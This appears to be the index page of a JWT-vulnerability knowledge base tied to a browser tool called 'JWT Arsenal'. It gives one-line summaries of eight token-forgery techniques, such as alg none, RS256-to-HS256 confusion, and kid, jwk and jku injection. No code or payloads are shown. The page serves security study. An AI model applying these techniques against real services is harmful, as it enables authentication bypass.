Knowledge Base

In-depth technical articles on JWT vulnerabilities - cryptographic mechanics, vulnerable code patterns, real-world bug bounty cases, and mitigations.

01
JWT Structure & Internals

How JWTs are encoded, which header fields matter to an attacker, and how the JOSE family of standards fits together.

02
Unverified Signature

The server decodes the token but never calls the cryptographic verification function - any forged payload is accepted.

03
Algorithm None

RFC 7518 legitimises "none" as a valid algorithm. Vulnerable libraries accept unsigned tokens when the header says so.

04
Algorithm Confusion

Switch alg from RS256 to HS256 - the library treats the RSA public key as the HMAC secret, which the attacker already knows.

05
KID Injection

The kid header selects which key to use. Unsanitised, it becomes a path traversal, SQL injection, or SSRF vector.

06
JWK Injection

Embed your own RSA public key in the JWT header. A vulnerable server uses it to verify - against the attacker's own key.

07
JKU Injection

Point jku at an attacker-controlled JWKS endpoint. The server fetches and trusts it for verification.

08
Public Key Recovery

Recover the RSA public key from two signatures via GCD - without server access - then chain to algorithm confusion.

GitHub
JWT Arsenal_
Loading cryptographic engineOK
Importing exploit modulesOK
Verifying secure contextOK
All systems operational
100% CLIENT-SIDE · NO DATA LEAVES YOUR BROWSER